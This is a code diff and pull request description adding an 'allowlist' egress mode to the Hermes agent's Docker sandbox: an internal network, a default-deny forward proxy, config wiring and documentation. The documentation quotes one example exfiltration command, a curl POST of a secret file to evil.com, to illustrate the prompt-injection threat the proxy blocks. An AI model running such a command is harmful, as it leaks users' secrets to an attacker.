+    exe = find_docker() or "docker"
+    return subprocess.run(
+        [exe, *args], capture_output=True, text=True, timeout=timeout, check=False
+    )
+
+
+def _outbound_network() -> str:
+    """Name of the runtime's default external network (proxy's second home)."""
+    exe = find_docker() or "docker"
+    return "podman" if os.path.basename(exe).startswith("podman") else "bridge"
+
+
+def _proxy_env() -> dict:
+    url = f"http://{PROXY_ALIAS}:{PROXY_PORT}"
+    no_proxy = "localhost,127.0.0.1,::1"
+    return {
+        "HTTP_PROXY": url, "HTTPS_PROXY": url,
+        "http_proxy": url, "https_proxy": url,
+        "NO_PROXY": no_proxy, "no_proxy": no_proxy,
+    }
+
+
+def _network_exists(network: str) -> bool:
+    return _docker("network", "inspect", network).returncode == 0
+
+
+def _ensure_network(network: str) -> None:
+    if _network_exists(network):
+        return
+    # --internal: containers on this network have no external connectivity.
+    res = _docker(
+        "network", "create", "--internal", "--label", f"{_EGRESS_LABEL}=1", network
+    )
+    if res.returncode != 0 and not _network_exists(network):
+        # Lost a race or a real failure — re-check, then surface.
+        raise RuntimeError(f"failed to create egress network {network}: {res.stderr.strip()}")
+
+
+def _proxy_running(proxy: str) -> bool:
+    res = _docker("inspect", "-f", "{{.State.Running}}", proxy)
+    return res.returncode == 0 and res.stdout.strip() == "true"
+
+
+def _proxy_exists(proxy: str) -> bool:
+    return _docker("inspect", "-f", "{{.State.Status}}", proxy).returncode == 0
+
+
+def _start_proxy(network: str, proxy: str, allowlist: list[str]) -> None:
+    """Create (or start) the dual-homed forward-proxy container."""
+    if _proxy_running(proxy):
+        return
+    if _proxy_exists(proxy):
+        # Exists but stopped — restart it (config is baked in at create time).
+        _docker("start", proxy)
+        if _proxy_running(proxy):
+            return
+        # Stale/broken container; remove and recreate cleanly.
+        _docker("rm", "-f", proxy)
+
+    run = _docker(
+        "run", "-d",
+        "--name", proxy,
+        "--label", f"{_EGRESS_LABEL}=1",
+        "--restart", "unless-stopped",
+        "--network", network,
+        "--network-alias", PROXY_ALIAS,
+        "--cap-drop", "ALL",
+        "--security-opt", "no-new-privileges",
+        "--pids-limit", "256",
+        "-e", f"EGRESS_ALLOWLIST={','.join(allowlist)}",
+        "-e", f"PROXY_PORT={PROXY_PORT}",
+        "-v", f"{_SERVER_SCRIPT}:/egress_proxy_server.py:ro",
+        PROXY_IMAGE,
+        "python", "/egress_proxy_server.py",
+    )
+    if run.returncode != 0:
+        # Concurrent create is fine if the other one is now running.
+        if _proxy_running(proxy):
+            return
+        raise RuntimeError(f"failed to start egress proxy {proxy}: {run.stderr.strip()}")
+
+    # Dual-home the proxy onto the runtime's default network so IT can reach the
+    # internet (the sandbox stays internal-only and must go through the proxy).
+    outbound = _outbound_network()
+    conn = _docker("network", "connect", outbound, proxy)
+    if conn.returncode != 0 and "already exists" not in conn.stderr.lower():
+        # Without outbound connectivity every proxied request would 502 forever.
+        # Remove the half-configured proxy and raise so the caller fails closed.
+        _docker("rm", "-f", proxy)
+        raise RuntimeError(
+            f"failed to connect egress proxy to {outbound!r} network: {conn.stderr.strip()}"
+        )
+
+
+def ensure_allowlisted_network(allowlist: list[str]) -> EgressProxy:
+    """Provision (idempotently) the internal network + filtered proxy.
+
+    Returns the network name to attach the sandbox to and the proxy env vars to
+    inject. Raises on unrecoverable provisioning failure — callers should treat a
+    raise as "cut egress" (fail-closed), never as "fall back to open network".
+    """
+    allowlist = list(allowlist or [])
+    network, proxy = _names(allowlist)
+    with _lock:
+        _ensure_network(network)
+        _start_proxy(network, proxy, allowlist)
+    logger.info(
+        "Egress allowlist active: network=%s proxy=%s allowlist=%s",
+        network, proxy, allowlist or "DENY-ALL",
+    )
+    return EgressProxy(network=network, proxy_env=_proxy_env())
+
+
+def prune_egress_proxies() -> int:
+    """Best-effort removal of egress proxies/networks with no sandbox attached.
+
+    Provisioning is lazy and shared (one proxy per distinct allowlist), so
+    nothing tears these down per-sandbox. Called from
+    ``cleanup_all_environments``; a proxy whose network still has a non-proxy
+    container attached (e.g. a sandbox from another hermes process, or one
+    whose async ``cleanup()`` hasn't finished detaching yet — such proxies are
+    caught on the next prune) is left alone. Returns the number of networks
+    removed; failures are logged only.
+    """
+    removed = 0
+    with _lock:
+        nets = _docker("network", "ls", "--filter", f"label={_EGRESS_LABEL}",
+                       "--format", "{{.Name}}")
+        if nets.returncode != 0:
+            logger.debug("Egress prune: could not list networks: %s", nets.stderr.strip())
+            return 0
+        for network in nets.stdout.split():
+            insp = _docker("network", "inspect", "-f",
+                           "{{range .Containers}}{{.Name}} {{end}}", network)
+            if insp.returncode != 0:
+                continue
+            attached = insp.stdout.split()
+            proxy = network.replace("hermes-egress-", "hermes-egress-proxy-", 1)
+            if any(name != proxy for name in attached):
+                continue  # still in use by a sandbox
+            _docker("rm", "-f", proxy)
+            res = _docker("network", "rm", network)
+            if res.returncode == 0:
+                removed += 1
+            else:
+                logger.debug("Egress prune: could not remove %s: %s",
+                             network, res.stderr.strip())
+    if removed:
+        logger.info("Pruned %d unused egress proxy network(s)", removed)
+    return removed

--- a/tools/environments/egress_proxy_server.py
+++ b/tools/environments/egress_proxy_server.py
@@ -1,0 +1,202 @@
+#!/usr/bin/env python3
+"""Self-contained, default-deny HTTP(S) forward proxy for the Docker sandbox.
+
+This file is mounted read-only into a ``python:3.13-slim`` container and run with
+``python /egress_proxy_server.py`` to provide domain-allowlisted egress for the
+"allowlist" network mode (see :mod:`tools.environments.egress_proxy`).
+
+Design constraints:
+- **stdlib only.** It runs inside a vanilla python-slim image with no extra deps
+  and cannot import the hermes package — everything it needs lives in this file.
+- **default-deny.** Only hosts matching ``EGRESS_ALLOWLIST`` are reachable; every
+  other CONNECT/absolute-URI request gets ``403``. An empty allowlist denies all.
+- **CONNECT for HTTPS.** The proxy never terminates TLS; it allowlists by the
+  CONNECT host (so no certificate interception) and blind-tunnels bytes.
+
+The host-matching logic (:func:`host_allowed`) is the security-critical core and
+is unit-tested from the hermes test suite by importing this module directly.
+"""
+
+from __future__ import annotations
+
+import ipaddress
+import os
+import select
+import socket
+import sys
+from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer
+from urllib.parse import urlsplit
+
+
+def parse_allowlist(raw: str | None) -> list[str]:
+    """Parse the comma/whitespace-separated ``EGRESS_ALLOWLIST`` env value."""
+    if not raw:
+        return []
+    out: list[str] = []
+    seen: set[str] = set()
+    for chunk in raw.replace("\n", ",").split(","):
+        host = chunk.strip().lower()
+        if host and host not in seen:
+            seen.add(host)
+            out.append(host)
+    return out
+
+
+def _is_ip_literal(value: str) -> bool:
+    try:
+        ipaddress.ip_address(value)
+        return True
+    except ValueError:
+        return False
+
+
+def host_allowed(host: str, allowlist: list[str]) -> bool:
+    """Return True iff ``host`` is permitted by ``allowlist`` (default-deny).
+
+    Matching is case-insensitive and supports:
+    - exact match: ``github.com`` matches ``github.com``
+    - leading-wildcard suffix: ``*.githubusercontent.com`` matches
+      ``objects.githubusercontent.com`` but NOT the bare ``githubusercontent.com``
+    - bare-domain subdomain match: an entry ``example.com`` also matches
+      ``api.example.com`` (a parent domain authorizes its subdomains)
+    """
+    if not host or not allowlist:
+        return False
+    host = host.strip().lower().rstrip(".")
+    for entry in allowlist:
+        entry = entry.strip().lower().rstrip(".")
+        if not entry:
+            continue
+        # Defense in depth: a literal IP must be listed exactly (no subdomain
+        # or wildcard logic — "x.1.2.3.4" must not match an entry "1.2.3.4").
+        if _is_ip_literal(entry):
+            if host == entry:
+                return True
+            continue
+        if entry.startswith("*."):
+            suffix = entry[1:]  # ".githubusercontent.com"
+            if host.endswith(suffix) and host != suffix.lstrip("."):
+                return True
+        elif host == entry or host.endswith("." + entry):
+            return True
+    return False
+
+
+_ALLOWLIST = parse_allowlist(os.environ.get("EGRESS_ALLOWLIST"))
+_PROXY_PORT = int(os.environ.get("PROXY_PORT", "8888"))
+_TUNNEL_BUF = 65536
+
+
+def _host_from_authority(authority: str) -> tuple[str, int]:
+    """Split ``host:port`` (CONNECT target) into (host, port)."""
+    if authority.startswith("["):  # IPv6 literal [::1]:443
+        host, _, rest = authority[1:].partition("]")
+        port = int(rest.lstrip(":")) if rest.lstrip(":") else 443
+        return host, port
+    host, _, port = authority.partition(":")
+    return host, int(port) if port else 443
+
+
+class _ProxyHandler(BaseHTTPRequestHandler):
+    protocol_version = "HTTP/1.1"
+
+    def log_message(self, fmt, *args):  # quieter, line-per-request to stderr
+        sys.stderr.write("egress-proxy: " + (fmt % args) + "\n")
+
+    def _deny(self, host: str):
+        self.send_response(403)
+        self.send_header("Content-Type", "text/plain")
+        self.send_header("Connection", "close")
+        body = f"egress denied by allowlist: {host}\n".encode()
+        self.send_header("Content-Length", str(len(body)))
+        self.end_headers()
+        self.wfile.write(body)
+
+    def do_CONNECT(self):  # noqa: N802 — HTTPS tunneling
+        host, port = _host_from_authority(self.path)
+        if not host_allowed(host, _ALLOWLIST):
+            self.log_message("DENY CONNECT %s", host)
+            return self._deny(host)
+        try:
+            upstream = socket.create_connection((host, port), timeout=30)
+        except OSError as e:
+            self.send_error(502, f"upstream connect failed: {e}")
+            return
+        self.send_response(200, "Connection Established")
+        self.end_headers()
+        self._tunnel(self.connection, upstream)
+
+    def _forward_plain(self):
+        """Forward an absolute-URI HTTP request (http://host/...)."""
+        parts = urlsplit(self.path)
+        host = parts.hostname or ""
+        if not host_allowed(host, _ALLOWLIST):
+            self.log_message("DENY %s %s", self.command, host)
+            return self._deny(host)
+        port = parts.port or 80
+        path = parts.path or "/"
+        if parts.query:
+            path += "?" + parts.query
+        length = int(self.headers.get("Content-Length", 0) or 0)
+        body = self.rfile.read(length) if length else b""
+        try:
+            upstream = socket.create_connection((host, port), timeout=30)
+        except OSError as e:
+            self.send_error(502, f"upstream connect failed: {e}")
+            return
+        req = [f"{self.command} {path} HTTP/1.1", f"Host: {parts.netloc}"]
+        for k, v in self.headers.items():
+            # Host is re-derived from the absolute URI above; copying the
+            # client's would send a duplicate Host header upstream.
+            if k.lower() in ("proxy-connection", "connection", "host"):
+                continue
+            req.append(f"{k}: {v}")
+        req.append("Connection: close")
+        req.append("")
+        req.append("")
+        upstream.sendall("\r\n".join(req).encode() + body)
+        self._tunnel(self.connection, upstream, half=True)
+
+    # All non-CONNECT verbs route through the same absolute-URI forwarder.
+    do_GET = do_POST = do_PUT = do_DELETE = do_HEAD = do_PATCH = do_OPTIONS = _forward_plain
+
+    def _tunnel(self, client: socket.socket, upstream: socket.socket, half: bool = False):
+        """Blind bidirectional byte tunnel until either side closes."""
+        socks = [client, upstream]
+        try:
+            while True:
+                readable, _, errored = select.select(socks, [], socks, 60)
+                if errored:
+                    break
+                if not readable:
+                    break
+                for s in readable:
+                    data = s.recv(_TUNNEL_BUF)
+                    if not data:
+                        return
+                    (upstream if s is client else client).sendall(data)
+        except OSError:
+            pass
+        finally:
+            for s in (upstream,):
+                try:
+                    s.close()
+                except OSError:
+                    pass
+
+
+def main() -> int:
+    sys.stderr.write(
+        f"egress-proxy: listening on :{_PROXY_PORT}, allowlist={_ALLOWLIST or 'DENY-ALL'}\n"
+    )
+    server = ThreadingHTTPServer(("0.0.0.0", _PROXY_PORT), _ProxyHandler)
+    server.daemon_threads = True
+    try:
+        server.serve_forever()
+    except KeyboardInterrupt:
+        pass
+    return 0
+
+
+if __name__ == "__main__":
+    raise SystemExit(main())

--- a/tools/file_tools.py
+++ b/tools/file_tools.py
@@ -1053,6 +1053,8 @@ def _get_file_ops(task_id: str = "default") -> ShellFileOperations:
                     "docker_forward_env": config.get("docker_forward_env", []),
                     "docker_run_as_host_user": config.get("docker_run_as_host_user", False),
                     "docker_network": config.get("docker_network", True),
+                    "container_network": config.get("container_network", "on"),
+                    "container_network_allowlist": config.get("container_network_allowlist", []),
                 }
 
             ssh_config = None

--- a/tools/terminal_tool.py
+++ b/tools/terminal_tool.py
@@ -1469,6 +1469,11 @@ def _get_env_config() -> Dict[str, Any]:
         "docker_orphan_reaper": os.getenv(
             "TERMINAL_DOCKER_ORPHAN_REAPER", "true"
         ).lower() in {"true", "1", "yes"},
+        # Egress control (docker backend): "on" | "off" | "allowlist"
+        "container_network": os.getenv("TERMINAL_CONTAINER_NETWORK", "on"),
+        "container_network_allowlist": _parse_env_var(
+            "TERMINAL_CONTAINER_NETWORK_ALLOWLIST", "[]", json.loads, "valid JSON"
+        ),
     }
 
 
@@ -1513,10 +1518,12 @@ def _create_environment(env_type: str, image: str, cwd: str, timeout: int,
     docker_env = cc.get("docker_env", {})
     docker_extra_args = cc.get("docker_extra_args", [])
     docker_network = cc.get("docker_network", True)
+    network_mode = cc.get("container_network", "on")
+    network_allowlist = cc.get("container_network_allowlist", [])
 
     if env_type == "local":
         return _LocalEnvironment(cwd=cwd, timeout=timeout)
-    
+
     elif env_type == "docker":
         # One-shot orphan reaper: clean up labeled containers left behind by
         # prior Hermes processes that hit SIGKILL / OOM / a closed terminal
@@ -1538,6 +1545,8 @@ def _create_environment(env_type: str, image: str, cwd: str, timeout: int,
             network=docker_network,
             extra_args=docker_extra_args,
             persist_across_processes=cc.get("docker_persist_across_processes", True),
+            network_mode=network_mode,
+            network_allowlist=network_allowlist,
         )
     
     elif env_type == "singularity":
@@ -1779,7 +1788,15 @@ def cleanup_all_environments():
             logger.info("Removed orphaned: %s", path)
         except OSError as e:
             logger.debug("Failed to remove orphaned path %s: %s", path, e)
-    
+
+    # Egress proxies ("allowlist" mode) are shared across sandboxes and not
+    # torn down per-environment — prune the ones nothing is attached to.
+    try:
+        from tools.environments.egress_proxy import prune_egress_proxies
+        prune_egress_proxies()
+    except Exception as e:
+        logger.debug("Egress proxy prune failed: %s", e)
+
     if cleaned > 0:
         logger.info("Cleaned %d environments", cleaned)
     return cleaned
@@ -2295,6 +2312,8 @@ def terminal_tool(
                                 "container_memory": config.get("container_memory", 5120),
                                 "container_disk": config.get("container_disk", 51200),
                                 "container_persistent": config.get("container_persistent", True),
+                                "container_network": config.get("container_network", "on"),
+                                "container_network_allowlist": config.get("container_network_allowlist", []),
                                 "modal_mode": config.get("modal_mode", "auto"),
                                 "docker_volumes": config.get("docker_volumes", []),
                                 "docker_mount_cwd_to_workspace": config.get("docker_mount_cwd_to_workspace", False),

--- a/website/docs/user-guide/configuration.md
+++ b/website/docs/user-guide/configuration.md
@@ -226,6 +226,8 @@ terminal:
     - "--gpus=all"
     - "--network=host"
   docker_network: true             # false = air-gap the container (--network=none)
+  container_network: "on"          # Egress: "on" | "off" | "allowlist" (see below)
+  container_network_allowlist: []  # Domains reachable in "allowlist" mode
 
   # Resource limits
   container_cpu: 1                 # CPU cores (0 = unlimited)
@@ -247,7 +249,37 @@ terminal:
 
 **`terminal.docker_extra_args`** (also overridable via `TERMINAL_DOCKER_EXTRA_ARGS='["--gpus=all"]'`) lets you pass arbitrary `docker run` flags that Hermes doesn't surface as first-class keys — `--gpus`, `--network`, `--add-host`, alternative `--security-opt` overrides, etc. Each entry must be a string; the list is appended last to the assembled `docker run` invocation so it can override Hermes' defaults if needed. Use sparingly — flags that conflict with the sandbox hardening (capability drops, `--user`, the workspace bind mount) will silently weaken isolation.
 
-**`terminal.docker_network`** (default `true`; env: `TERMINAL_DOCKER_NETWORK`) — set to `false` to run the sandbox container with `--network=none`, cutting off all network egress from agent commands. This applies to the execution container used by `terminal`, `execute_code`, and the file tools. Because containers persist across Hermes processes, flipping this to `false` while an older networked container exists will remove that container and start a fresh air-gapped one (a warning is logged); background processes running inside it are lost. Prefer this key over passing `--network=none` through `docker_extra_args`.
+**`terminal.docker_network`** (default `true`; env: `TERMINAL_DOCKER_NETWORK`) — set to `false` to run the sandbox container with `--network=none`, cutting off all network egress from agent commands. This applies to the execution container used by `terminal`, `execute_code`, and the file tools. Because containers persist across Hermes processes, flipping this to `false` while an older networked container exists will remove that container and start a fresh air-gapped one (a warning is logged); background processes running inside it are lost. Prefer this key over passing `--network=none` through `docker_extra_args`. Superseded by `container_network` below — `false` remains a hard "off" and is never weakened by `container_network` defaults.
+
+#### Sandbox egress control (`container_network`)
+
+The approval gate blocks destructive commands and remote-code-execution patterns, but it does **not** block outbound data exfiltration (`curl -X POST evil.com -d @secret`) — network egress is the channel a prompt-injection would use to leak data. `terminal.container_network` (env: `TERMINAL_CONTAINER_NETWORK`) restricts it:
+
+- **`"on"`** (default) — full network, current behavior.
+- **`"off"`** — no network at all (`--network=none`).
+- **`"allowlist"`** — HTTP(S) only, routed through a domain-filtered proxy on an `--internal` Docker network. Requests to non-allowlisted domains get a 403 from the proxy; raw sockets and non-proxied egress have no route out at all.
+
+Any other value **fails closed to `"off"`** — a typo never grants full network.
+
+Like `docker_network`, this applies to the shared execution container used by `terminal`, `execute_code`, and the file tools. It does not cover the Codex app-server runtime, which executes in Codex's own sandbox; use Codex's network policy when this allowlist is a required boundary.
+
+**`terminal.container_network_allowlist`** (env: `TERMINAL_CONTAINER_NETWORK_ALLOWLIST`, JSON array) lists the domains reachable in `"allowlist"` mode. Entries are hostnames/domains only (no scheme or path); a bare domain also authorizes its subdomains, a leading `*.` wildcard matches subdomains but not the apex, and IP literals must match exactly. An empty list in `"allowlist"` mode means deny-all.
+
+```yaml
+terminal:
+  backend: docker
+  container_network: "allowlist"
+  container_network_allowlist:
+    - "pypi.org"
+    - "files.pythonhosted.org"
+    - "registry.npmjs.org"
+    - "github.com"
+    - "objects.githubusercontent.com"
+```
+
+**Container reuse interaction:** because containers persist across Hermes processes, changing the mode or the allowlist replaces the persisted container on the next startup — its network no longer matches the config, so it is removed and recreated (a warning is logged; in-container background processes are lost). Under `"on"`, a container stranded on a `hermes-egress-*` internal network is likewise replaced, while a deliberately air-gapped (`--network=none`) container is left alone.
+
+**Proxy lifecycle:** the filtering proxy and its internal network are labeled `hermes.egress`, keyed by a hash of the sorted allowlist (identical allowlists share one proxy; different allowlists get isolated networks), and pruned automatically when no sandbox uses them. Inspect manually with `docker ps -a --filter label=hermes.egress` and `docker network ls --filter label=hermes.egress`.
 
 **Requirements:** Docker Desktop or Docker Engine installed and running. Hermes probes `$PATH` plus common macOS install locations (`/usr/local/bin/docker`, `/opt/homebrew/bin/docker`, Docker Desktop app bundle). Podman is supported out of the box: set `HERMES_DOCKER_BINARY=podman` (or the full path) to force it when both are installed.
 
@@ -301,6 +333,8 @@ Every key under `terminal:` has an env-var override of the form `TERMINAL_<KEY_U
 | `TERMINAL_DOCKER_MOUNT_CWD_TO_WORKSPACE` | `docker_mount_cwd_to_workspace` | `true` / `false` |
 | `TERMINAL_DOCKER_RUN_AS_HOST_USER` | `docker_run_as_host_user` | `true` / `false` |
 | `TERMINAL_DOCKER_NETWORK` | `docker_network` | `true` / `false` — default `true`; `false` = `--network=none` |
+| `TERMINAL_CONTAINER_NETWORK` | `container_network` | `"on"` / `"off"` / `"allowlist"` — default `"on"`; unknown values fail closed to `"off"` |
+| `TERMINAL_CONTAINER_NETWORK_ALLOWLIST` | `container_network_allowlist` | JSON array: `'["pypi.org","github.com"]'` |
 | `TERMINAL_DOCKER_PERSIST_ACROSS_PROCESSES` | `docker_persist_across_processes` | `true` / `false` — default `true` |
 | `TERMINAL_DOCKER_ORPHAN_REAPER` | `docker_orphan_reaper` | `true` / `false` — default `true` |
 | `TERMINAL_CONTAINER_CPU` | `container_cpu` | CPU cores |


### PR DESCRIPTION
## What does this PR do?

Adds a third egress mode for Docker sandboxes: `terminal.container_network: "allowlist"`, alongside the existing on/off (`network: bool`). In allowlist mode, sandboxes attach to a per-allowlist `--internal` network and reach the internet only through a shared, dual-homed, **stdlib-only** forward proxy — default-deny, TLS pass-through via CONNECT (no certificate interception). Raw / non-proxied egress has no route out.

The threat model is the one already described in `docs/security/network-egress-isolation.md` (prompt-injected data exfiltration via `curl`/`wget` from inside a sandbox). That doc covers an ops-level pattern (compose + external squid/envoy); this PR provides the same control **in-app, per-sandbox, auto-provisioned**, with no external infrastructure. The two are complementary — happy to add a cross-reference to that doc if desired.

## Related Issue

No linked issue — feature proposal. Closest prior art is the deployment pattern in `docs/security/network-egress-isolation.md`.

## Type of Change

- [x] ✨ New feature (non-breaking change that adds functionality)

## Changes Made

- `tools/environments/egress_proxy.py` (new): network/proxy provisioning — one `--internal` network + one shared proxy container per allowlist hash, labeled `hermes.egress`, pruned from `cleanup_all_environments()`
- `tools/environments/egress_proxy_server.py` (new): self-contained stdlib proxy, mounted read-only into `python:3.13-slim` (CONNECT tunnel, absolute-URI plain HTTP forward, 403 deny, 502 upstream-failure)
- `tools/environments/docker.py`: `DockerEnvironment(network_mode=, network_allowlist=)`, mode resolution + allowlist normalization; legacy `docker_network: false` remains a hard deny even when new defaults are present
- Wiring (the env-driven bridges without which the environment layer is inert): `cli.py` env_mappings, `gateway/run.py` `_terminal_env_map`, `tools/terminal_tool.py` `_get_env_config()`/`_create_environment()`, `hermes_cli/config.py` `TERMINAL_CONFIG_ENV_MAP` + defaults + `hermes config` display
- `cli-config.yaml.example`: documented `container_network` / `container_network_allowlist` incl. fail-closed and prune semantics, plus the explicit scope boundary that Codex app-server commands use Codex's separate sandbox
- `scripts/release.py`: AUTHOR_MAP entry for this contributor (contributor-check)

Design points:
- **Fail closed everywhere**: unknown mode → `"off"`; proxy provisioning or outbound-connect failure → `--network=none`; legacy `docker_network: false` cannot be weakened by `container_network: "on"` (never silently open)
- IP-literal allowlist entries require an exact match (no subdomain/wildcard logic on IPs)
- Warns when user `docker_env` overrides the injected proxy env vars

## How to Test

1. `bash scripts/run_tests.sh tests/tools/test_egress_proxy.py tests/tools/test_docker_environment.py` — 110 tests (provisioning/restart/race/fail-closed orchestration, real proxy-server integration over loopback, prune keep/remove, config-wiring regression guards)
2. Live E2E (requires Docker): set `terminal.container_network: "allowlist"` and `container_network_allowlist: ["pypi.org"]` → inside the sandbox, `https://pypi.org` returns 200 via the proxy, `https://example.com` fails with `Tunnel connection failed: 403 Forbidden`, raw-socket egress is unreachable
3. Verified E2E against a live Docker daemon on macOS (Apple Silicon) — allowlisted 200 / unlisted 403 / no raw route / prune leaves no leftovers

## Checklist

### Code

- [x] I've read the [Contributing Guide](https://github.com/NousResearch/hermes-agent/blob/main/CONTRIBUTING.md)
- [x] My commit messages follow [Conventional Commits](https://www.conventionalcommits.org/)
- [x] I searched for [existing PRs](https://github.com/NousResearch/hermes-agent/pulls) to make sure this isn't a duplicate
- [x] My PR contains **only** changes related to this fix/feature (plus the AUTHOR_MAP entry required by contributor-check)
- [x] Affected suites pass via the canonical runner (`scripts/run_tests.sh`, 110 tests); relying on CI for the full matrix — my host lacks some optional deps (whisper/fastapi/mautrix) so a full local run has known env-caused failures unrelated to this change
- [x] I've added tests for my changes
- [x] I've tested on my platform: macOS 26 (Apple Silicon), Docker via Colima

### Documentation & Housekeeping

- [x] I've updated relevant documentation (`cli-config.yaml.example`, docstrings)
- [x] I've updated `cli-config.yaml.example` for the new config keys
- [x] `CONTRIBUTING.md` / `AGENTS.md` — N/A (no architecture/workflow change)
- [x] Cross-platform: docker-backend-only feature; the proxy is stdlib-only and runs inside a Linux container, so host OS differences don't apply
- [x] Tool descriptions/schemas — N/A (no tool schema change)

🤖 Generated with [Claude Code](https://claude.com/claude-code)

https://claude.ai/code/session_013n8YAnnTrwfzD5oECy6zdi
